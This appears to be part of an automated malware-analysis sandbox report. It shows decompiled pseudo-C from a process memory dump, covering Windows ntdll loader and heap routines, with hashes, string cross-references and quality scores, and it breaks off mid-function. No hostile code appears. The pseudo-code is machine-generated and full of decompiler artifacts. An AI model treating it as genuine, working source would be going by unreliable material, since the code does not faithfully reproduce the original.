                                                                            0x0109b7cf
                                                                            0x0109b7d1
                                                                            0x0109b7d1
                                                                            0x0109b7d4
                                                                            0x0109b7dc
                                                                            0x0109b8bb
                                                                            0x0109b8bb
                                                                            0x0109b8be
                                                                            0x0109b8be
                                                                            0x0109b8c1
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0109b8c3
                                                                            0x0109b8c5
                                                                            0x0109b8c7
                                                                            0x0109b8e0
                                                                            0x00000000
                                                                            0x0109b8e0
                                                                            0x0109b8cc
                                                                            0x0109b8cc
                                                                            0x00000000
                                                                            0x0109b8cc
                                                                            0x0109b8d6
                                                                            0x0109b8d6
                                                                            0x00000000
                                                                            0x0109b7dc
                                                                            0x0109b7b6

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                            • API String ID: 0-1334570610
                                                                            • Opcode ID: 8cfc66ce6423d0e2ae095b784d01e6cd3eabf4587101b4ad37984855949b6736
                                                                            • Instruction ID: d99fdae4a58b6aa2e764eb845f4caf2792d65605c5360199c85e5cc89f8b87ef
                                                                            • Opcode Fuzzy Hash: 8cfc66ce6423d0e2ae095b784d01e6cd3eabf4587101b4ad37984855949b6736
                                                                            • Instruction Fuzzy Hash: 0861DF306002019FDB68CF28D494BAABBE5FF44324F1885ADE8898F255D730E891DB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 98%
                                                                            			E01087E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                                            				char _v8;
                                                                            				intOrPtr _v12;
                                                                            				intOrPtr _v16;
                                                                            				intOrPtr _v20;
                                                                            				char _v24;
                                                                            				signed int _t73;
                                                                            				void* _t77;
                                                                            				char* _t82;
                                                                            				char* _t87;
                                                                            				signed char* _t97;
                                                                            				signed char _t102;
                                                                            				intOrPtr _t107;
                                                                            				signed char* _t108;
                                                                            				intOrPtr _t112;
                                                                            				intOrPtr _t124;
                                                                            				intOrPtr _t125;
                                                                            				intOrPtr _t126;
                                                                            
                                                                            				_t107 = __edx;
                                                                            				_v12 = __ecx;
                                                                            				_t125 =  *((intOrPtr*)(__ecx + 0x20));
                                                                            				_t124 = 0;
                                                                            				_v20 = __edx;
                                                                            				if(E0108CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
                                                                            					_t112 = _v8;
                                                                            				} else {
                                                                            					_t112 = 0;
                                                                            					_v8 = 0;
                                                                            				}
                                                                            				if(_t112 != 0) {
                                                                            					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
                                                                            						_t124 = 0xc000007b;
                                                                            						goto L8;
                                                                            					}
                                                                            					_t73 =  *(_t125 + 0x34) | 0x00400000;
                                                                            					 *(_t125 + 0x34) = _t73;
                                                                            					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
                                                                            						goto L3;
                                                                            					}
                                                                            					 *(_t125 + 0x34) = _t73 | 0x01000000;
                                                                            					_t124 = E0107C9A4( *((intOrPtr*)(_t125 + 0x18)));
                                                                            					if(_t124 < 0) {
                                                                            						goto L8;
                                                                            					} else {
                                                                            						goto L3;
                                                                            					}
                                                                            				} else {
                                                                            					L3:
                                                                            					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
                                                                            						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
                                                                            						L8:
                                                                            						return _t124;
                                                                            					}
                                                                            					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
                                                                            						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
                                                                            							goto L5;
                                                                            						}
                                                                            						_t102 =  *0x1165780; // 0x0
                                                                            						if((_t102 & 0x00000003) != 0) {
                                                                            							E010F5510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
                                                                            							_t102 =  *0x1165780; // 0x0
                                                                            						}
                                                                            						if((_t102 & 0x00000010) != 0) {
                                                                            							asm("int3");
                                                                            						}
                                                                            						_t124 = 0xc0000428;
                                                                            						goto L8;
                                                                            					}
                                                                            					L5:
                                                                            					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
                                                                            						goto L8;
                                                                            					}
                                                                            					_t77 = _a4 - 0x40000003;
                                                                            					if(_t77 == 0 || _t77 == 0x33) {
                                                                            						_v16 =  *((intOrPtr*)(_t125 + 0x18));
                                                                            						if(E01097D50() != 0) {
                                                                            							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                            						} else {
                                                                            							_t82 = 0x7ffe0384;
                                                                            						}
                                                                            						_t108 = 0x7ffe0385;
                                                                            						if( *_t82 != 0) {
                                                                            							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                                                                            								if(E01097D50() == 0) {
                                                                            									_t97 = 0x7ffe0385;
                                                                            								} else {
                                                                            									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                                            								}
                                                                            								if(( *_t97 & 0x00000020) != 0) {
                                                                            									E010F7016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
                                                                            								}
                                                                            							}
                                                                            						}
                                                                            						if(_a4 != 0x40000003) {
                                                                            							L14:
                                                                            							_t126 =  *((intOrPtr*)(_t125 + 0x18));
                                                                            							if(E01097D50() != 0) {
                                                                            								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                            							} else {
                                                                            								_t87 = 0x7ffe0384;
                                                                            							}
                                                                            							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                                                                            								if(E01097D50() != 0) {
                                                                            									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                                            								}
                                                                            								if(( *_t108 & 0x00000020) != 0) {
                                                                            									E010F7016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
                                                                            								}
                                                                            							}
                                                                            							goto L8;
                                                                            						} else {
                                                                            							_v16 = _t125 + 0x24;
                                                                            							_t124 = E010AA1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
                                                                            							if(_t124 < 0) {
                                                                            								E0107B1E1(_t124, 0x1490, 0, _v16);
                                                                            								goto L8;
                                                                            							}
                                                                            							goto L14;
                                                                            						}
                                                                            					} else {
                                                                            						goto L8;
                                                                            					}
                                                                            				}
                                                                            			}





















                                                                            Strings
                                                                            • LdrpCompleteMapModule, xrefs: 010D9898
                                                                            • minkernel\ntdll\ldrmap.c, xrefs: 010D98A2
                                                                            • Could not validate the crypto signature for DLL %wZ, xrefs: 010D9891
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                            • API String ID: 0-1676968949
                                                                            • Opcode ID: 48198f9ad9265b18d12d2db3da037515bdac354148beec98b5783d948b62b3a7
                                                                            • Instruction ID: 1669b7f1b1fc0adcc20f994e0783bd970f0c0f687cb4a5fd4861f05510c6bfbd
                                                                            • Opcode Fuzzy Hash: 48198f9ad9265b18d12d2db3da037515bdac354148beec98b5783d948b62b3a7
                                                                            • Instruction Fuzzy Hash: 6E513531608742DBEB62EB5CC984B6ABBE0EF04714F2405A9E9D19B7D6C730ED00CB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 64%
                                                                            			E011223E3(signed int __ecx, unsigned int __edx) {
                                                                            				intOrPtr _v8;
                                                                            				intOrPtr _t42;
                                                                            				char _t43;
                                                                            				signed short _t44;
                                                                            				signed short _t48;
                                                                            				signed char _t51;
                                                                            				signed short _t52;
                                                                            				intOrPtr _t54;
                                                                            				signed short _t64;
                                                                            				signed short _t66;
                                                                            				intOrPtr _t69;
                                                                            				signed short _t73;
                                                                            				signed short _t76;
                                                                            				signed short _t77;
                                                                            				signed short _t79;
                                                                            				void* _t83;
                                                                            				signed int _t84;
                                                                            				signed int _t85;
                                                                            				signed char _t94;
                                                                            				unsigned int _t99;
                                                                            				unsigned int _t104;
                                                                            				signed int _t108;
                                                                            				void* _t110;
                                                                            				void* _t111;
                                                                            				unsigned int _t114;
                                                                            
                                                                            				_t84 = __ecx;
                                                                            				_push(__ecx);
                                                                            				_t114 = __edx;
                                                                            				_t42 =  *((intOrPtr*)(__edx + 7));
                                                                            				if(_t42 == 1) {
                                                                            					L49:
                                                                            					_t43 = 1;
                                                                            					L50:
                                                                            					return _t43;
                                                                            				}
                                                                            				if(_t42 != 4) {
                                                                            					if(_t42 >= 0) {
                                                                            						if( *(__ecx + 0x4c) == 0) {
                                                                            							_t44 =  *__edx & 0x0000ffff;
                                                                            						} else {
                                                                            							_t73 =  *__edx;
                                                                            							if(( *(__ecx + 0x4c) & _t73) != 0) {
                                                                            								_t73 = _t73 ^  *(__ecx + 0x50);
                                                                            							}
                                                                            							_t44 = _t73 & 0x0000ffff;
                                                                            						}
                                                                            					} else {
                                                                            						_t104 = __edx >> 0x00000003 ^  *__edx ^  *0x116874c ^ __ecx;
                                                                            						if(_t104 == 0) {
                                                                            							_t76 =  *((intOrPtr*)(__edx - (_t104 >> 0xd)));
                                                                            						} else {
                                                                            							_t76 = 0;
                                                                            						}
                                                                            						_t44 =  *((intOrPtr*)(_t76 + 0x14));
                                                                            					}
                                                                            					_t94 =  *((intOrPtr*)(_t114 + 7));
                                                                            					_t108 = _t44 & 0xffff;
                                                                            					if(_t94 != 5) {
                                                                            						if((_t94 & 0x00000040) == 0) {
                                                                            							if((_t94 & 0x0000003f) == 0x3f) {
                                                                            								if(_t94 >= 0) {
                                                                            									if( *(_t84 + 0x4c) == 0) {
                                                                            										_t48 =  *_t114 & 0x0000ffff;
                                                                            									} else {
                                                                            										_t66 =  *_t114;
                                                                            										if(( *(_t84 + 0x4c) & _t66) != 0) {
                                                                            											_t66 = _t66 ^  *(_t84 + 0x50);
                                                                            										}
                                                                            										_t48 = _t66 & 0x0000ffff;
                                                                            									}
                                                                            								} else {
                                                                            									_t99 = _t114 >> 0x00000003 ^  *_t114 ^  *0x116874c ^ _t84;
                                                                            									if(_t99 == 0) {
                                                                            										_t69 =  *((intOrPtr*)(_t114 - (_t99 >> 0xd)));
                                                                            									} else {
                                                                            										_t69 = 0;
                                                                            									}
                                                                            									_t48 =  *((intOrPtr*)(_t69 + 0x14));
                                                                            								}
                                                                            								_t85 =  *(_t114 + (_t48 & 0xffff) * 8 - 4);
                                                                            							} else {
                                                                            								_t85 = _t94 & 0x3f;
                                                                            							}
                                                                            						} else {
                                                                            							_t85 =  *(_t114 + 4 + (_t94 & 0x3f) * 8) & 0x0000ffff;
                                                                            						}
                                                                            					} else {
                                                                            						_t85 =  *(_t84 + 0x54) & 0x0000ffff ^  *(_t114 + 4) & 0x0000ffff;
                                                                            					}
                                                                            					_t110 = (_t108 << 3) - _t85;
                                                                            				} else {
                                                                            					if( *(__ecx + 0x4c) == 0) {
                                                                            						_t77 =  *__edx & 0x0000ffff;
                                                                            					} else {
                                                                            						_t79 =  *__edx;
                                                                            						if(( *(__ecx + 0x4c) & _t79) != 0) {
                                                                            							_t79 = _t79 ^  *(__ecx + 0x50);
                                                                            						}
                                                                            						_t77 = _t79 & 0x0000ffff;
                                                                            					}
                                                                            					_t110 =  *((intOrPtr*)(_t114 - 8)) - (_t77 & 0x0000ffff);
                                                                            				}
                                                                            				_t51 =  *((intOrPtr*)(_t114 + 7));
                                                                            				if(_t51 != 5) {
                                                                            					if((_t51 & 0x00000040) == 0) {
                                                                            						_t52 = 0;
                                                                            						goto L42;
                                                                            					}
                                                                            					_t64 = _t51 & 0x3f;
                                                                            					goto L38;
                                                                            				} else {
                                                                            					_t64 =  *(_t114 + 6) & 0x000000ff;
                                                                            					L38:
                                                                            					_t52 = _t64 << 0x00000003 & 0x0000ffff;
                                                                            					L42:
                                                                            					_t35 = _t114 + 8; // -16
                                                                            					_t111 = _t110 + (_t52 & 0x0000ffff);
                                                                            					_t83 = _t35 + _t111;
                                                                            					_t54 = E010CD4F0(_t83, 0x1056c58, 8);
                                                                            					_v8 = _t54;
                                                                            					if(_t54 == 8) {
                                                                            						goto L49;
                                                                            					}
                                                                            					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                            						_push("HEAP: ");
                                                                            						E0107B150();
                                                                            					} else {
                                                                            						E0107B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                            					}
                                                                            					_push(_t111);
                                                                            					_push(_v8 + _t83);
                                                                            					E0107B150("Heap block at %p modified at %p past requested size of %Ix\n", _t114);
                                                                            					if( *((char*)( *[fs:0x30] + 2)) != 0) {
                                                                            						 *0x1166378 = 1;
                                                                            						asm("int3");
                                                                            						 *0x1166378 = 0;
                                                                            					}
                                                                            					_t43 = 0;
                                                                            					goto L50;
                                                                            				}
                                                                            			}





























                                                                            Strings
                                                                            • HEAP: , xrefs: 0112255C
                                                                            • HEAP[%wZ]: , xrefs: 0112254F
                                                                            • Heap block at %p modified at %p past requested size of %Ix, xrefs: 0112256F
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                                            • API String ID: 0-3815128232
                                                                            • Opcode ID: d3be904a2782c08c6aa73e788eec9195d92ca310a6b249d91fa7beb073d0e610
                                                                            • Instruction ID: 06807e941fa8c55778a41ef14ad164a3ac2ef26bb49770db16d546788d239929
                                                                            • Opcode Fuzzy Hash: d3be904a2782c08c6aa73e788eec9195d92ca310a6b249d91fa7beb073d0e610
                                                                            • Instruction Fuzzy Hash: C65148342002B08AE37CCF1EC8447BA7BF1DF48644F558859E8D28B285D77AD867DB61
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 93%
                                                                            			E0107E620(void* __ecx, short* __edx, short* _a4) {
                                                                            				char _v16;
                                                                            				char _v20;
                                                                            				intOrPtr _v24;
                                                                            				char* _v28;
                                                                            				char _v32;
                                                                            				char _v36;
                                                                            				char _v44;
                                                                            				signed int _v48;
                                                                            				intOrPtr _v52;
                                                                            				void* _v56;
                                                                            				void* _v60;
                                                                            				char _v64;
                                                                            				void* _v68;
                                                                            				void* _v76;
                                                                            				void* _v84;
                                                                            				signed int _t59;
                                                                            				signed int _t74;
                                                                            				signed short* _t75;
                                                                            				signed int _t76;
                                                                            				signed short* _t78;
                                                                            				signed int _t83;
                                                                            				short* _t93;
                                                                            				signed short* _t94;
                                                                            				short* _t96;
                                                                            				void* _t97;
                                                                            				signed int _t99;
                                                                            				void* _t101;
                                                                            				void* _t102;
                                                                            
                                                                            				_t80 = __ecx;
                                                                            				_t101 = (_t99 & 0xfffffff8) - 0x34;
                                                                            				_t96 = __edx;
                                                                            				_v44 = __edx;
                                                                            				_t78 = 0;
                                                                            				_v56 = 0;
                                                                            				if(__ecx == 0 || __edx == 0) {
                                                                            					L28:
                                                                            					_t97 = 0xc000000d;
                                                                            				} else {
                                                                            					_t93 = _a4;
                                                                            					if(_t93 == 0) {
                                                                            						goto L28;
                                                                            					}
                                                                            					_t78 = E0107F358(__ecx, 0xac);
                                                                            					if(_t78 == 0) {
                                                                            						_t97 = 0xc0000017;
                                                                            						L6:
                                                                            						if(_v56 != 0) {
                                                                            							_push(_v56);
                                                                            							E010B95D0();
                                                                            						}
                                                                            						if(_t78 != 0) {
                                                                            							L010977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
                                                                            						}
                                                                            						return _t97;
                                                                            					}
                                                                            					E010BFA60(_t78, 0, 0x158);
                                                                            					_v48 = _v48 & 0x00000000;
                                                                            					_t102 = _t101 + 0xc;
                                                                            					 *_t96 = 0;
                                                                            					 *_t93 = 0;
                                                                            					E010BBB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
                                                                            					_v36 = 0x18;
                                                                            					_v28 =  &_v44;
                                                                            					_v64 = 0;
                                                                            					_push( &_v36);
                                                                            					_push(0x20019);
                                                                            					_v32 = 0;
                                                                            					_push( &_v64);
                                                                            					_v24 = 0x40;
                                                                            					_v20 = 0;
                                                                            					_v16 = 0;
                                                                            					_t97 = E010B9600();
                                                                            					if(_t97 < 0) {
                                                                            						goto L6;
                                                                            					}
                                                                            					E010BBB40(0,  &_v36, L"InstallLanguageFallback");
                                                                            					_push(0);
                                                                            					_v48 = 4;
                                                                            					_t97 = L0107F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
                                                                            					if(_t97 >= 0) {
                                                                            						if(_v52 != 1) {
                                                                            							L17:
                                                                            							_t97 = 0xc0000001;
                                                                            							goto L6;
                                                                            						}
                                                                            						_t59 =  *_t78 & 0x0000ffff;
                                                                            						_t94 = _t78;
                                                                            						_t83 = _t59;
                                                                            						if(_t59 == 0) {
                                                                            							L19:
                                                                            							if(_t83 == 0) {
                                                                            								L23:
                                                                            								E010BBB40(_t83, _t102 + 0x24, _t78);
                                                                            								if(L010843C0( &_v48,  &_v64) == 0) {
                                                                            									goto L17;
                                                                            								}
                                                                            								_t84 = _v48;
                                                                            								 *_v48 = _v56;
                                                                            								if( *_t94 != 0) {
                                                                            									E010BBB40(_t84, _t102 + 0x24, _t94);
                                                                            									if(L010843C0( &_v48,  &_v64) != 0) {
                                                                            										 *_a4 = _v56;
                                                                            									} else {
                                                                            										_t97 = 0xc0000001;
                                                                            										 *_v48 = 0;
                                                                            									}
                                                                            								}
                                                                            								goto L6;
                                                                            							}
                                                                            							_t83 = _t83 & 0x0000ffff;
                                                                            							while(_t83 == 0x20) {
                                                                            								_t94 =  &(_t94[1]);
                                                                            								_t74 =  *_t94 & 0x0000ffff;
                                                                            								_t83 = _t74;
                                                                            								if(_t74 != 0) {
                                                                            									continue;
                                                                            								}
                                                                            								goto L23;
                                                                            							}
                                                                            							goto L23;
                                                                            						} else {
                                                                            							goto L14;
                                                                            						}
                                                                            						while(1) {
                                                                            							L14:
                                                                            							_t27 =  &(_t94[1]); // 0x2
                                                                            							_t75 = _t27;
                                                                            							if(_t83 == 0x2c) {
                                                                            								break;
                                                                            							}
                                                                            							_t94 = _t75;
                                                                            							_t76 =  *_t94 & 0x0000ffff;
                                                                            							_t83 = _t76;
                                                                            							if(_t76 != 0) {
                                                                            								continue;
                                                                            							}
                                                                            							goto L23;
                                                                            						}
                                                                            						 *_t94 = 0;
                                                                            						_t94 = _t75;
                                                                            						_t83 =  *_t75 & 0x0000ffff;
                                                                            						goto L19;
                                                                            					}
                                                                            				}
                                                                            			}

                                                                            Strings
                                                                            • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0107E68C
                                                                            • InstallLanguageFallback, xrefs: 0107E6DB
                                                                            • @, xrefs: 0107E6C0
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                            • API String ID: 0-1757540487
                                                                            • Opcode ID: c11b45ff6c908f5dd55b7ee9bbd0d071fed8be6471cd33edafce09420050f1ce
                                                                            • Instruction ID: 819156aa10d802c8b53294cd63c35f9c3dc7bf23a862656bdcbb302fe4205b28
                                                                            • Opcode Fuzzy Hash: c11b45ff6c908f5dd55b7ee9bbd0d071fed8be6471cd33edafce09420050f1ce
                                                                            • Instruction Fuzzy Hash: 0651B3725093469BD711DF28C880AABB7E8BF88714F4409AEF9C5D7240FB34D904C7A2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 60%
                                                                            			E0109B8E4(unsigned int __edx) {
                                                                            				void* __ecx;
                                                                            				void* __edi;
                                                                            				intOrPtr* _t16;
                                                                            				intOrPtr _t18;
                                                                            				void* _t27;
                                                                            				void* _t28;
                                                                            				unsigned int _t30;
                                                                            				intOrPtr* _t31;
                                                                            				unsigned int _t38;
                                                                            				void* _t39;
                                                                            				unsigned int _t40;
                                                                            
                                                                            				_t40 = __edx;
                                                                            				_t39 = _t28;
                                                                            				if( *0x1168748 >= 1) {
                                                                            					__eflags = (__edx + 0x00000fff & 0xfffff000) - __edx;
                                                                            					if((__edx + 0x00000fff & 0xfffff000) != __edx) {
                                                                            						_t18 =  *[fs:0x30];
                                                                            						__eflags =  *(_t18 + 0xc);
                                                                            						if( *(_t18 + 0xc) == 0) {
                                                                            							_push("HEAP: ");
                                                                            							E0107B150();
                                                                            						} else {
                                                                            							E0107B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                            						}
                                                                            						_push("(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)");
                                                                            						E0107B150();
                                                                            						__eflags =  *0x1167bc8;
                                                                            						if(__eflags == 0) {
                                                                            							E01132073(_t27, 1, _t39, __eflags);
                                                                            						}
                                                                            					}
                                                                            				}
                                                                            				_t38 =  *(_t39 + 0xb8);
                                                                            				if(_t38 != 0) {
                                                                            					_t13 = _t40 >> 0xc;
                                                                            					__eflags = _t13;
                                                                            					while(1) {
                                                                            						__eflags = _t13 -  *((intOrPtr*)(_t38 + 4));
                                                                            						if(_t13 <  *((intOrPtr*)(_t38 + 4))) {
                                                                            							break;
                                                                            						}
                                                                            						_t30 =  *_t38;
                                                                            						__eflags = _t30;
                                                                            						if(_t30 != 0) {
                                                                            							_t38 = _t30;
                                                                            							continue;
                                                                            						}
                                                                            						_t13 =  *((intOrPtr*)(_t38 + 4)) - 1;
                                                                            						__eflags =  *((intOrPtr*)(_t38 + 4)) - 1;
                                                                            						break;
                                                                            					}
                                                                            					return E0109AB40(_t39, _t38, 0, _t13, _t40);
                                                                            				} else {
                                                                            					_t31 = _t39 + 0x8c;
                                                                            					_t16 =  *_t31;
                                                                            					while(_t31 != _t16) {
                                                                            						__eflags =  *((intOrPtr*)(_t16 + 0x14)) - _t40;
                                                                            						if( *((intOrPtr*)(_t16 + 0x14)) >= _t40) {
                                                                            							return _t16;
                                                                            						}
                                                                            						_t16 =  *_t16;
                                                                            					}
                                                                            					return _t31;
                                                                            				}
                                                                            			}

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                            • API String ID: 0-2558761708
                                                                            • Opcode ID: f669878f2038074853e7808e497d96e75a371c94bbcfaf906677555ace4772a2
                                                                            • Instruction ID: c352a5baa35030d2d276f977a0ddd2a58c8e2b5f4db728df188552e367285eb4
                                                                            • Opcode Fuzzy Hash: f669878f2038074853e7808e497d96e75a371c94bbcfaf906677555ace4772a2
                                                                            • Instruction Fuzzy Hash: 7B11D3317241069FDB69D71AE4A4F7AB7E5EF80634F148069E4C6CB251E630D880E785
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 60%
                                                                            			E0113E539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
                                                                            				signed int _v20;
                                                                            				char _v24;
                                                                            				signed int _v40;
                                                                            				char _v44;
                                                                            				intOrPtr _v48;
                                                                            				signed int _v52;
                                                                            				unsigned int _v56;
                                                                            				char _v60;
                                                                            				signed int _v64;
                                                                            				char _v68;
                                                                            				signed int _v72;
                                                                            				void* __ebx;
                                                                            				void* __edi;
                                                                            				char _t87;
                                                                            				signed int _t90;
                                                                            				signed int _t94;
                                                                            				signed int _t100;
                                                                            				intOrPtr* _t113;
                                                                            				signed int _t122;
                                                                            				void* _t132;
                                                                            				void* _t135;
                                                                            				signed int _t139;
                                                                            				signed int* _t141;
                                                                            				signed int _t146;
                                                                            				signed int _t147;
                                                                            				void* _t153;
                                                                            				signed int _t155;
                                                                            				signed int _t159;
                                                                            				char _t166;
                                                                            				void* _t172;
                                                                            				void* _t176;
                                                                            				signed int _t177;
                                                                            				intOrPtr* _t179;
                                                                            
                                                                            				_t179 = __ecx;
                                                                            				_v48 = __edx;
                                                                            				_v68 = 0;
                                                                            				_v72 = 0;
                                                                            				_push(__ecx[1]);
                                                                            				_push( *__ecx);
                                                                            				_push(0);
                                                                            				_t153 = 0x14;
                                                                            				_t135 = _t153;
                                                                            				_t132 = E0113BBBB(_t135, _t153);
                                                                            				if(_t132 == 0) {
                                                                            					_t166 = _v68;
                                                                            					goto L43;
                                                                            				} else {
                                                                            					_t155 = 0;
                                                                            					_v52 = 0;
                                                                            					asm("stosd");
                                                                            					asm("stosd");
                                                                            					asm("stosd");
                                                                            					asm("stosd");
                                                                            					asm("stosd");
                                                                            					_v56 = __ecx[1];
                                                                            					if( *__ecx >> 8 < 2) {
                                                                            						_t155 = 1;
                                                                            						_v52 = 1;
                                                                            					}
                                                                            					_t139 = _a4;
                                                                            					_t87 = (_t155 << 0xc) + _t139;
                                                                            					_v60 = _t87;
                                                                            					if(_t87 < _t139) {
                                                                            						L11:
                                                                            						_t166 = _v68;
                                                                            						L12:
                                                                            						if(_t132 != 0) {
                                                                            							E0113BCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
                                                                            						}
                                                                            						L43:
                                                                            						if(_v72 != 0) {
                                                                            							_push( *((intOrPtr*)(_t179 + 4)));
                                                                            							_push( *_t179);
                                                                            							_push(0x8000);
                                                                            							E0113AFDE( &_v72,  &_v60);
                                                                            						}
                                                                            						L46:
                                                                            						return _t166;
                                                                            					}
                                                                            					_t90 =  *(_t179 + 0xc) & 0x40000000;
                                                                            					asm("sbb edi, edi");
                                                                            					_t172 = ( ~_t90 & 0x0000003c) + 4;
                                                                            					if(_t90 != 0) {
                                                                            						_push(0);
                                                                            						_push(0x14);
                                                                            						_push( &_v44);
                                                                            						_push(3);
                                                                            						_push(_t179);
                                                                            						_push(0xffffffff);
                                                                            						if(E010B9730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
                                                                            							_push(_t139);
                                                                            							E0113A80D(_t179, 1, _v40, 0);
                                                                            							_t172 = 4;
                                                                            						}
                                                                            					}
                                                                            					_t141 =  &_v72;
                                                                            					if(E0113A854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
                                                                            						_v64 = _a4;
                                                                            						_t94 =  *(_t179 + 0xc) & 0x40000000;
                                                                            						asm("sbb edi, edi");
                                                                            						_t176 = ( ~_t94 & 0x0000003c) + 4;
                                                                            						if(_t94 != 0) {
                                                                            							_push(0);
                                                                            							_push(0x14);
                                                                            							_push( &_v24);
                                                                            							_push(3);
                                                                            							_push(_t179);
                                                                            							_push(0xffffffff);
                                                                            							if(E010B9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
                                                                            								_push(_t141);
                                                                            								E0113A80D(_t179, 1, _v20, 0);
                                                                            								_t176 = 4;
                                                                            							}
                                                                            						}
                                                                            						if(E0113A854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
                                                                            							goto L11;
                                                                            						} else {
                                                                            							_t177 = _v64;
                                                                            							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
                                                                            							_t100 = _v52 + _v52;
                                                                            							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
                                                                            							 *(_t132 + 0x10) = _t146;
                                                                            							asm("bsf eax, [esp+0x18]");
                                                                            							_v52 = _t100;
                                                                            							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
                                                                            							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
                                                                            							_t47 =  &_a8;
                                                                            							 *_t47 = _a8 & 0x00000001;
                                                                            							if( *_t47 == 0) {
                                                                            								E01092280(_t179 + 0x30, _t179 + 0x30);
                                                                            							}
                                                                            							_t147 =  *(_t179 + 0x34);
                                                                            							_t159 =  *(_t179 + 0x38) & 1;
                                                                            							_v68 = 0;
                                                                            							if(_t147 == 0) {
                                                                            								L35:
                                                                            								E0108B090(_t179 + 0x34, _t147, _v68, _t132);
                                                                            								if(_a8 == 0) {
                                                                            									E0108FFB0(_t132, _t177, _t179 + 0x30);
                                                                            								}
                                                                            								asm("lock xadd [eax], ecx");
                                                                            								asm("lock xadd [eax], edx");
                                                                            								_t132 = 0;
                                                                            								_v72 = _v72 & 0;
                                                                            								_v68 = _v72;
                                                                            								if(E01097D50() == 0) {
                                                                            									_t113 = 0x7ffe0388;
                                                                            								} else {
                                                                            									_t177 = _v64;
                                                                            									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                                            								}
                                                                            								if( *_t113 == _t132) {
                                                                            									_t166 = _v68;
                                                                            									goto L46;
                                                                            								} else {
                                                                            									_t166 = _v68;
